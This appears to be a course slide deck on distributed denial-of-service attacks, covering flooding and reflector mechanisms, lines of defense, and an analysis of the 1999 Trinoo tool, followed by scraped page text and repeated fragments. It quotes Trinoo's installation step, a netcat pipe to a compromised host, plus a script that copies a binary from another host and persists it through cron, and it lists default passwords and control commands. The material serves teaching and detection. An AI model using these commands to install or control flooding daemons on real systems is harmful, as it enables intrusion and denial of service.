DOS Attack

An Introduction to DDoS
And the “Trinoo” Attack Tool
Acknowledgement: Ray Lam, Ivan Wong
Operating System Concepts 1.1
Outline
■ Background on DDoS
✦ Attack mechanism
✦ Ways to defend
■ The attack tool – Trinoo
✦ Introduction
✦ Attack scenario
✦ Symptoms and defense
✦ Weaknesses and next evolution
Background on DDoS
Attack mechanism
Denial-Of-Service
■ Flooding-based
■ Send packets to victims
✦ Network resources
✦ System resources
■ Traditional DOS
✦ One attacker
■ Distributed DOS
✦ Countless attackers
Attack Mechanism
A TCP SYN-ACK, TCP

■ Direct Attack RST, ICMP, UDP..
TCP SYN, ICMP, UDP
With R’s Address as R
source IP address.
■ Reflector Attack
V
A
TCP SYN, ICMP, UDP.. With
V’s Address as source IP address.
R
TCP SYN-ACK, TCP RST, ICMP,
V UDP..
Attack Architecture
A
A TCP SYN,
ICMP,
Masters (handlers) UDP..
Masters (handlers) (with V’s
address as
Agents (Daemons or Zombies)
the source
Agents (Daemons or Zombies) IP
addresses)
Reflectors
TCP SYN, ICMP,

UDP.. (the source TCP SYN-ACK,
IP addresses are TCP RST,
usually spoofed) ICMP, UDP..
V V
Direct Attack Reflector Attack
Attack Methods
Attack packets Reply packets
Smurf ICMP echo queries to broadcast address ICMP echo replies
SYN flooding TCP SYN packets TCP SYN ACK packets
RST flooding TCP packets to closed ports TCP RST packets
ICMP flooding ■ICMP queries ■ICMP replies

■UDP packets to closed ports ■Port unreachable
■IP packets with low TTL ■Time exceeded
DNS reply flooding DNS queries (recursive) to DNS servers DNS replies
BackScatter Analysis (Moore et al.)
■ Measured DOS activity on the Internet.

■ TCP (94+ %)
■ UDP (2 %)
■ ICMP (2 %)
TCP attacks based mainly on SYN flooding
Background on DDoS
Ways to defend
Strategy
■ Three lines of defense:

✦ Attack prevention
- before the attack
✦ Attack detection and filtering
- during the attack
✦ Attack source traceback
- during and after the attack
Attack prevention
■ Protect hosts from installation of masters

and agents by attackers
■ Scan hosts for symptoms of agents being
installed
■ Monitor network traffic for known message
exchanges among attackers, masters,
agents
Attack prevention
■ Inadequate and hard to deploy

■ Don’t-care users leave security holes
■ ISP and enterprise networks do not have
incentives
Attack source traceback
■ Identify actual origin of packet

■ Without relying on source IP of packet
■ 2 approaches
✦ Routers record info of packets
✦ Routers send additional info of packets to
destination
Attack source traceback
■ Source traceback cannot stop

ongoing DDoS attack
✦ Cannot trace origins behind firewalls,
NAT (network address translators)
✦ More to do for reflector attack (attack
packets from legitimate sources)
■ Useful in post-attack law
enforcement
Attack detection and filtering
■ Detection
✦ Identify DDoS attack and attack
packets
■ Filtering
✦ Classify normal and attack packets
✦ Drop attack packets
■ Can be done in 4 places

✦ Victim’s network
✦ Victim’s ISP network
✦ Further upstream ISP network
✦ Attack source networks
■ Dispersed agents send packets to
single victim
■ Like pouring packets from top of
funnel
Effectiveness of detection increases

Attack source
Effectiveness of filtering increases

networks
Further upstream
ISP networks
Victim’s ISP network
Victim’s network
Victim
■ Detection
✦ Easy at victim’s network – large amount of
attack packets
✦ Difficult at individual agent’s network – small
amount of attack packets
■ Filtering
✦ Effective at agents’ networks – less likely to
drop normal packets
✦ Ineffective at victim’s network – more normal
packets are dropped
D&F at agent’s network
■ Usually cannot detect DDoS attack

■ Can filter attack packets with
address spoofed
✦ Attack packets in direct attacks
✦ Attack packets from agents to
reflectors in reflector attacks
■ Ensuring all ISPs to install ingress
packet filtering is impossible
D&F at victim’s network
■ Detect DDoS attack

✦ Unusually high volume of incoming traffic of
certain packet types
✦ Degraded server and network performance
■ Filtering is ineffective
✦ Attack and normal packets have same
destination – victim’s IP and port
✦ Attack packets have source IP spoofed or come
from many different IPs
✦ Attack and normal packets indistinguishable
D&F at victim’s upstream ISP
■ Often requested by victim to filter attack

packets
■ Alert protocol
✦ Victim cannot receive ACK from ISP
✦ Requires strong authentication and encryption
■ Filtering ineffective
■ ISP network may also be jammed
D&F at further upstream ISP
■ Backpressure approach
■ Victim detects DDoS attack
■ Upstream ISPs filter attack packets
The attack tool – Trinoo
Introduction
Introduction
■ Discovered in August 1999

■ Daemons found on Solaris 2.x systems
■ Attack a system in University of Minnesota
■ Victim unusable for 2 days
Attack type
■ UDP flooding
■ Default size of UDP packet: 1000 bytes
✦ malloc() buffer of this size and send
uninitialized content
■ Default period of attack: 120 seconds
■ Destination port: randomly chosen from 0 –
65534
Attack scenario
Installation
1. Hack an account
✦ Acts as repository
✔ Scanning tools, attack tools, Trinoo
daemons, Trinoo maters, etc.
✦ Requirements
✔ High bandwidth connection
✔ Large number of users
✔ Little administrative oversight
Installation
1. Compromise systems
✦ Look for vulnerable systems
✔ Unpatched Sun Solaris and Linux
✦ Remote buffer overflow exploitation
✔ Set up root account
✔ Open TCP ports
✦ Keep a `friend list`
Installation
1. Install daemons
✦ Use “netcat” (“nc”) and “trin.sh”
./trin.sh | nc 128.aaa.167.217 1524 &

./trin.sh | nc 128.aaa.167.218 1524 &
✦ netcat
✔ Network version of “cat”
✦ trin.sh
✔ Shell script to set up daemons
Installation
■ trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"

echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"

echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"

echo "crontab cron"
echo "echo launched"
echo "exit"
Architecture
Attacker Direct
Attack
Masters (handlers)
Agents (Daemons or Zombies)
Victim
Communication ports
Attacker Master Daemon
Port 31335 UDP

TCP
Port 27665 UDP Port 27444
■ Monitor specific ports to detect presence of master,

agent
Password protection
■ Password used to prevent administrators or

other hackers to take control
■ Encrypted password compiled into master
and daemon using crypt()
■ Clear-text password is sent over network –
session is not encrypted
■ Received password is encrypted and
compared
Password protection
■ Default passwords
✦ “l44adsl” – trinoo daemon password
✦ “gOrave” – trinoo master server startup
✦ “betaalmostdone” – trinoo master remote
interface password
✦ “killme” – trinoo master password to
control “mdie” command
Login to master
■ Telnet to port 27665 of the host with master

■ Enter password “betaalmostdone”
■ Warn if others try to connect the master
[root@r2 root]# telnet r1 27665

Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
Master and daemon
■ Communicate by UDP packets

■ Command line format
✦ arg1 password arg2
■ Default password is “l44adsl”
■ When daemon starts, it sends “HELLO” to
master
■ Master maintains list of daemon
Master commands
■ dos IP
✦ DoS the IP address specified
✦ “aaa l44adsl IP” sent to each daemon
■ mdos <ip1:ip2:ip3>
✦ DoS the IPs simultaneously
■ mtimer N
✦ Set attack period to N seconds
Master commands
■ bcast
✦ List all daemons’ IP
■ mdie password
✦ Shutdown all daemons
■ killdead
✦ Invite all daemons to send “HELLO” to
master
✦ Delete all dead daemons from the list
Daemon commands
■ Not directly used; only used by

master to send commands to
daemons
■ Consist of 3 letters
✦ Avoid exposing the commands by using
Unix command “strings” on the binary
Daemon commands
■ aaa password IP
✦ DoS specified IP
■ bbb password N
✦ Set attack period to N seconds
■ rsz password N
✦ Set attack packet size to N bytes
Symptoms and defense
Symptoms
■ Masters
✦ Crontab
✦ Friend list
✔… * * * * * /usr/sbin/rpc.listen
✔ …-b
# ls -l ... ...-b
-rw------- 1 root root 25 Sep 26 14:46 ...
-rw------- 1 root root 50 Sep 26 14:30 ...-b
Symptoms
■ Masters (Con’t)
✦ Socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:27665 *:* LISTEN
...
udp 0 0 *:31335 *:*
...
Symptoms
■ Masters (Con’t)
✦ File status
# lsof | egrep ":31335|:27665"

master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
Symptoms
■ Daemons
✦ Socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
...
udp 0 0 *:1024 *:*
udp 0 0 *:27444 *:*
...
Symptoms
■ Daemons (Con’t)
✦ File status
# lsof | egrep ":27444"

ns 1316 root 3u inet 2502 UDP *:27444
# lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ns 1316 root cwd DIR 3,1 1024 153694 /tmp/...
ns 1316 root rtd DIR 3,1 1024 2 /
ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns
ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-
2.1.1.so
ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
Defenses
■ Prevent root level compromise

✦ Patch systems
✦ Set up firewalls
✦ Monitor traffics
■ Block abused ports
✦ High numbered UDP ports
✦ Trade off
✔ Also block normal programs using the same ports
Weaknesses and next evolution
Weaknesses
■ Single kind of attack

✦ UDP flooding
✦ Easily defended by single defense tools
■ Use IP as destination address
✦ “Moving target defense” – victim
changes IP to avoid attack
Weaknesses
■ Password, encrypted password, commands

visible in binary images
✦ Use Unix command “strings” to obtain
- strings master
- strings –n3 ns
✦ Check if Trinoo found
✦ Crack the encrypted passwords
Weaknesses
■ Password travels in plain text in network

✦ Daemon password frequently sent in master-to-
daemon commands
✦ Get password by “ngrep”, “tcpdump” which show
UDP payload
Uproot a Trinoo network
■ Locate a daemon
■ Use “strings” to obtain IPs of masters
■ Contact sites with master installed
■ Those sites check list of daemons
✦ By inspecting file “…” or get master login password
and use “bcast” command
✦ Get “mdie” password
✦ Use “mdie” to shut down all daemons
✦ “mdie” periodically as daemons restarted by crontab
Next evolution
■ Combination of several attack types

✦ SYN flood, UDP flood, ICMP flood…
✦ Higher chance of successful attack
■ Stronger encryption of embedded strings,
passwords
■ Use encrypted communication channel
■ Communicate by protocol difficult to be
detected or blocked, e.g. ICMP
References
■ R. Chang, “Defending against Flooding-Based

Distributed Denial-of-Service Attacks: A Tutorial,”
Oct. 2002
■ D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed
Denial of Service Attack Tool,”
http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt
, Oct. 1999

DOS Attack

Enviado por

Dados do documento

Descrição original:

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

DOS Attack

Enviado por

Direitos autorais:

Formatos disponíveis

An Introduction to DDoS

And the “Trinoo” Attack Tool

Acknowledgement: Ray Lam, Ivan Wong

A TCP SYN-ACK, TCP

TCP SYN, ICMP,

Smurf ICMP echo queries to broadcast address ICMP echo replies

SYN flooding TCP SYN packets TCP SYN ACK packets

RST flooding TCP packets to closed ports TCP RST packets

ICMP flooding ■ICMP queries ■ICMP replies

■ Measured DOS activity on the Internet.

TCP attacks based mainly on SYN flooding

■ Three lines of defense:

■ Protect hosts from installation of masters

■ Inadequate and hard to deploy

■ Identify actual origin of packet

■ Source traceback cannot stop

■ Can be done in 4 places

Effectiveness of detection increases

Effectiveness of filtering increases

Victim’s ISP network

■ Usually cannot detect DDoS attack

■ Detect DDoS attack

■ Often requested by victim to filter attack

■ Discovered in August 1999

./trin.sh | nc 128.aaa.167.217 1524 &

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"

Agents (Daemons or Zombies)

Attacker Master Daemon

Port 31335 UDP

■ Monitor specific ports to detect presence of master,

■ Password used to prevent administrators or

■ Telnet to port 27665 of the host with master

[root@r2 root]# telnet r1 27665

■ Communicate by UDP packets

■ Not directly used; only used by

Symptoms and defense

# lsof | egrep ":31335|:27665"

# lsof | egrep ":27444"

■ Prevent root level compromise

Weaknesses and next evolution

■ Single kind of attack

■ Password, encrypted password, commands

■ Password travels in plain text in network

■ Combination of several attack types

■ R. Chang, “Defending against Flooding-Based

Você também pode gostar